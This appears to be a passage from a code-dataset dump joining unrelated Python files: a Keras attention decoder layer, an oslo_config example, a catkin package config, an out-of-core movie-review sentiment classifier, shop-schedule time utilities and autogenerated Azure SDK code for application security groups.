"""
self.V_a = self.add_weight(shape=(self.units,),
name='V_a',
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.W_a = self.add_weight(shape=(self.units, self.units),
name='W_a',
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.U_a = self.add_weight(shape=(self.input_dim, self.units),
name='U_a',
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.b_a = self.add_weight(shape=(self.units,),
name='b_a',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
"""
Matrices for the r (reset) gate
"""
self.C_r = self.add_weight(shape=(self.input_dim, self.units),
name='C_r',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.U_r = self.add_weight(shape=(self.units, self.units),
name='U_r',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.W_r = self.add_weight(shape=(self.output_dim, self.units),
name='W_r',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.b_r = self.add_weight(shape=(self.units, ),
name='b_r',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
"""
Matrices for the z (update) gate
"""
self.C_z = self.add_weight(shape=(self.input_dim, self.units),
name='C_z',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.U_z = self.add_weight(shape=(self.units, self.units),
name='U_z',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.W_z = self.add_weight(shape=(self.output_dim, self.units),
name='W_z',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.b_z = self.add_weight(shape=(self.units, ),
name='b_z',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
"""
Matrices for the proposal
"""
self.C_p = self.add_weight(shape=(self.input_dim, self.units),
name='C_p',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.U_p = self.add_weight(shape=(self.units, self.units),
name='U_p',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.W_p = self.add_weight(shape=(self.output_dim, self.units),
name='W_p',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.b_p = self.add_weight(shape=(self.units, ),
name='b_p',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
"""
Matrices for making the final prediction vector
"""
self.C_o = self.add_weight(shape=(self.input_dim, self.output_dim),
name='C_o',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.U_o = self.add_weight(shape=(self.units, self.output_dim),
name='U_o',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.W_o = self.add_weight(shape=(self.output_dim, self.output_dim),
name='W_o',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.b_o = self.add_weight(shape=(self.output_dim, ),
name='b_o',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
# For creating the initial state:
self.W_s = self.add_weight(shape=(self.input_dim, self.units),
name='W_s',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.input_spec = [
InputSpec(shape=(self.batch_size, self.timesteps, self.input_dim))]
self.built = True
def call(self, x):
# store the whole sequence so we can "attend" to it at each timestep
self.x_seq = x
        # apply a dense layer over the time dimension of the sequence
        # do it here because it doesn't depend on any previous steps,
        # therefore we can save computation time:
self._uxpb = self._time_distributed_dense(self.x_seq, self.U_a, b=self.b_a,
input_dim=self.input_dim,
timesteps=self.timesteps,
output_dim=self.units)
return super(AttentionDecoder, self).call(x)
def _time_distributed_dense(self, x, w, b=None, dropout=None,
input_dim=None, output_dim=None,
timesteps=None, training=None):
if not input_dim:
input_dim = K.shape(x)[2]
if not timesteps:
timesteps = K.shape(x)[1]
if not output_dim:
output_dim = K.shape(w)[1]
if dropout is not None and 0. < dropout < 1.:
# apply the same dropout pattern at every timestep
ones = K.ones_like(K.reshape(x[:, 0, :], (-1, input_dim)))
dropout_matrix = K.dropout(ones, dropout)
expanded_dropout_matrix = K.repeat(dropout_matrix, timesteps)
x = K.in_train_phase(x * expanded_dropout_matrix, x, training=training)
# collapse time dimension and batch dimension together
x = K.reshape(x, (-1, input_dim))
x = K.dot(x, w)
if b is not None:
x = K.bias_add(x, b)
# reshape to 3D tensor
if K.backend() == 'tensorflow':
x = K.reshape(x, K.stack([-1, timesteps, output_dim]))
x.set_shape([None, None, output_dim])
else:
x = K.reshape(x, (-1, timesteps, output_dim))
return x
def get_initial_state(self, inputs):
print('inputs shape:', inputs.get_shape())
# apply the matrix on the first time step to get the initial s0.
s0 = activations.tanh(K.dot(inputs[:, 0], self.W_s))
# from keras.layers.recurrent to initialize a vector of (batchsize,
# output_dim)
y0 = K.zeros_like(inputs) # (samples, timesteps, input_dims)
y0 = K.sum(y0, axis=(1, 2)) # (samples, )
y0 = K.expand_dims(y0) # (samples, 1)
y0 = K.tile(y0, [1, self.output_dim])
return [y0, s0]
def step(self, x, states):
ytm, stm = states
# repeat the hidden state to the length of the sequence
_stm = K.repeat(stm, self.timesteps)
        # now multiply the weight matrix with the repeated hidden state
_Wxstm = K.dot(_stm, self.W_a)
# calculate the attention probabilities
# this relates how much other timesteps contributed to this one.
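        # (In Bahdanau-style notation, as we read the code below, this computes
        # e_tj = V_a^T tanh(W_a s_{t-1} + U_a h_j + b_a); the normalization
        # a_tj = exp(e_tj) / sum_k exp(e_tk) follows a few lines down.)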
et = K.dot(activations.tanh(_Wxstm + self._uxpb),
K.expand_dims(self.V_a))
at = K.exp(et)
at_sum = K.sum(at, axis=1)
at_sum_repeated = K.repeat(at_sum, self.timesteps)
at /= at_sum_repeated # vector of size (batchsize, timesteps, 1)
# calculate the context vector
context = K.squeeze(K.batch_dot(at, self.x_seq, axes=1), axis=1)
# ~~~> calculate new hidden state
# first calculate the "r" gate:
rt = activations.sigmoid(
K.dot(ytm, self.W_r)
+ K.dot(stm, self.U_r)
+ K.dot(context, self.C_r)
+ self.b_r)
# now calculate the "z" gate
zt = activations.sigmoid(
K.dot(ytm, self.W_z)
+ K.dot(stm, self.U_z)
+ K.dot(context, self.C_z)
+ self.b_z)
# calculate the proposal hidden state:
s_tp = activations.tanh(
K.dot(ytm, self.W_p)
+ K.dot((rt * stm), self.U_p)
+ K.dot(context, self.C_p)
+ self.b_p)
# new hidden state:
st = (1-zt)*stm + zt * s_tp
yt = activations.softmax(
K.dot(ytm, self.W_o)
+ K.dot(stm, self.U_o)
+ K.dot(context, self.C_o)
+ self.b_o)
if self.return_probabilities:
return at, [yt, st]
else:
return yt, [yt, st]
def compute_output_shape(self, input_shape):
"""
        For Keras internal compatibility checking
"""
if self.return_probabilities:
return (None, self.timesteps, self.timesteps)
else:
return (None, self.timesteps, self.output_dim)
def get_config(self):
"""
For rebuilding models on load time.
"""
config = {
'output_dim': self.output_dim,
'units': self.units,
'return_probabilities': self.return_probabilities
}
base_config = super(AttentionDecoder, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
# check to see if it compiles
if __name__ == '__main__':
from keras.layers import Input, LSTM
from keras.models import Model
from keras.layers.wrappers import Bidirectional
i = Input(shape=(100,104), dtype='float32')
enc = Bidirectional(LSTM(64, return_sequences=True), merge_mode='concat')(i)
dec = AttentionDecoder(32, 4)(enc)
model = Model(inputs=i, outputs=dec)
model.summary()
| 42.198606
| 118
| 0.553175
|
71dd6824844c89126d53e168a3cd7f9ab284bfed
| 489
|
py
|
Python
|
test/oslo_test/module1.py
|
peter-wangxu/python_play
|
5774c192a49ea0c35504697dd75e1c2c8e366097
|
[
"Apache-2.0"
] | null | null | null |
test/oslo_test/module1.py
|
peter-wangxu/python_play
|
5774c192a49ea0c35504697dd75e1c2c8e366097
|
[
"Apache-2.0"
] | null | null | null |
test/oslo_test/module1.py
|
peter-wangxu/python_play
|
5774c192a49ea0c35504697dd75e1c2c8e366097
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
from oslo_config import cfg
import test1.module2
opt_group = cfg.OptGroup(name='simple',
title='A Simple Example')
simple_opts = [
cfg.BoolOpt('enable', default=False,
help=('True enables, False disables.'))
]
CONF = cfg.CONF
CONF.register_group(opt_group)
CONF.register_opts(simple_opts, opt_group)
if __name__ == "__main__":
CONF(default_config_files=['app.conf'])
print(CONF.simple.enable)
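# For illustration, an app.conf with the following (assumed) contents would make
# the script print True:
#   [simple]
#   enable = True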
| 25.736842
| 55
| 0.689162
|
40450ac93cfa72bfb0f5daf12a88f7e6e2d8382b
| 369
|
py
|
Python
|
ros/build/waypoint_updater/catkin_generated/pkg.develspace.context.pc.py
|
bryantravissmith/SelfDrivingCar-ND-Capstone
|
58147b0b3977a918b2cf9f182c315c8dd7c041e2
|
[
"MIT"
] | null | null | null |
ros/build/waypoint_updater/catkin_generated/pkg.develspace.context.pc.py
|
bryantravissmith/SelfDrivingCar-ND-Capstone
|
58147b0b3977a918b2cf9f182c315c8dd7c041e2
|
[
"MIT"
] | 11
|
2020-01-28T23:13:19.000Z
|
2022-03-12T00:10:25.000Z
|
ros/build/waypoint_updater/catkin_generated/pkg.develspace.context.pc.py
|
bryantravissmith/SelfDrivingCar-ND-Capstone
|
58147b0b3977a918b2cf9f182c315c8dd7c041e2
|
[
"MIT"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "waypoint_updater"
PROJECT_SPACE_DIR = "/capstone/ros/devel"
PROJECT_VERSION = "0.0.0"
| 41
| 68
| 0.704607
|
02442bdca847aaefa807753df4b42bb874f69a5e
| 1,066
|
py
|
Python
|
ch08/main.py
|
stoneflyop1/py_machine_learning
|
18fd635d312f957ca4fcc23d856a1bcd4cf95f48
|
[
"MIT"
] | null | null | null |
ch08/main.py
|
stoneflyop1/py_machine_learning
|
18fd635d312f957ca4fcc23d856a1bcd4cf95f48
|
[
"MIT"
] | null | null | null |
ch08/main.py
|
stoneflyop1/py_machine_learning
|
18fd635d312f957ca4fcc23d856a1bcd4cf95f48
|
[
"MIT"
] | null | null | null |
import pandas as pd
df = pd.read_csv('../data/movie_data.csv')
import cleandata
df['review'] = df['review'].apply(cleandata.preprocessor)
# grid search, very time-consuming
#import gridlearn
#gridlearn.learn(df)
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.linear_model import SGDClassifier
import tokendata
vect = HashingVectorizer(
decode_error='ignore', n_features=(2 ** 21),
preprocessor=None, tokenizer=tokendata.tokenizer
)
clf = SGDClassifier(loss='log', random_state=1, n_iter=1)
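# loss='log' makes the SGD classifier a logistic-regression model; partial_fit
# below lets it learn out-of-core, one minibatch of documents at a time.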
import ooclearn
doc_stream = ooclearn.stream_docs(path='../data/movie_data.csv')
import pyprind  # progress bar
pbar = pyprind.ProgBar(45)
import numpy as np
classes = np.array([0, 1])
for _ in range(45):
X_train, y_train = ooclearn.get_minibatch(doc_stream, size=1000)
if not X_train: break
X_train = vect.transform(X_train)
clf.partial_fit(X_train, y_train, classes=classes)
pbar.update()
X_test, y_test = ooclearn.get_minibatch(doc_stream, size=5000)
X_test = vect.transform(X_test)
print('Accuracy: %.3f' % clf.score(X_test, y_test))
| 28.810811
| 68
| 0.752345
|
facb76938b3e6e7a2c3b52ab8531fee900bfdcdc
| 563
|
py
|
Python
|
timeline/utils.py
|
vstasn/django-shop-schedule
|
e48ae78454d0e0687b96c07e4877ffacf466a8fd
|
[
"MIT"
] | null | null | null |
timeline/utils.py
|
vstasn/django-shop-schedule
|
e48ae78454d0e0687b96c07e4877ffacf466a8fd
|
[
"MIT"
] | null | null | null |
timeline/utils.py
|
vstasn/django-shop-schedule
|
e48ae78454d0e0687b96c07e4877ffacf466a8fd
|
[
"MIT"
] | null | null | null |
import datetime
def format_time(day_of_week, time):
return "{}{:02d}{:02d}".format(day_of_week, time.hour, time.minute)
def timetostring(rtime):
full_date = datetime.datetime.strptime(str(rtime).zfill(5), "%w%H%M")
return "{:02d}.{:02d}".format(full_date.hour, full_date.minute)
def subminutes(time1, minutes):
tmp_datetime = datetime.datetime.combine(datetime.date(1, 1, 1), time1)
return (tmp_datetime - datetime.timedelta(minutes=minutes)).time()
def next_weekday(day_of_week):
return 0 if day_of_week == 6 else day_of_week + 1
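# Illustrative round trip (hypothetical values):
#   format_time(1, datetime.time(9, 5))  -> "10905"
#   timetostring(10905)                  -> "09.05"
#   subminutes(datetime.time(9, 5), 10)  -> datetime.time(8, 55)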
| 28.15
| 75
| 0.714032
|
2280b99146eb01e95ad8e96290b2e4c19fb52266
| 27,007
|
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_application_security_groups_operations.py
|
vbarbaresi/azure-sdk-for-python
|
397ba46c51d001ff89c66b170f5576cf8f49c05f
|
[
"MIT"
] | 8
|
2021-01-13T23:44:08.000Z
|
2021-03-17T10:13:36.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_application_security_groups_operations.py
|
vbarbaresi/azure-sdk-for-python
|
397ba46c51d001ff89c66b170f5576cf8f49c05f
|
[
"MIT"
] | null | null | null |
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_application_security_groups_operations.py
|
vbarbaresi/azure-sdk-for-python
|
397ba46c51d001ff89c66b170f5576cf8f49c05f
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ApplicationSecurityGroupsOperations(object):
"""ApplicationSecurityGroupsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified application security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
application_security_group_name=application_security_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.ApplicationSecurityGroup"
"""Gets information about the specified application security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplicationSecurityGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.ApplicationSecurityGroup"
**kwargs # type: Any
):
# type: (...) -> "models.ApplicationSecurityGroup"
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ApplicationSecurityGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.ApplicationSecurityGroup"
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.ApplicationSecurityGroup"]
"""Creates or updates an application security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:param parameters: Parameters supplied to the create or update ApplicationSecurityGroup
operation.
:type parameters: ~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ApplicationSecurityGroup or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
application_security_group_name=application_security_group_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def update_tags(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "models.ApplicationSecurityGroup"
"""Updates an application security group's tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:param parameters: Parameters supplied to update application security group tags.
:type parameters: ~azure.mgmt.network.v2019_09_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplicationSecurityGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ApplicationSecurityGroupListResult"]
"""Gets all application security groups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ApplicationSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationSecurityGroups'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ApplicationSecurityGroupListResult"]
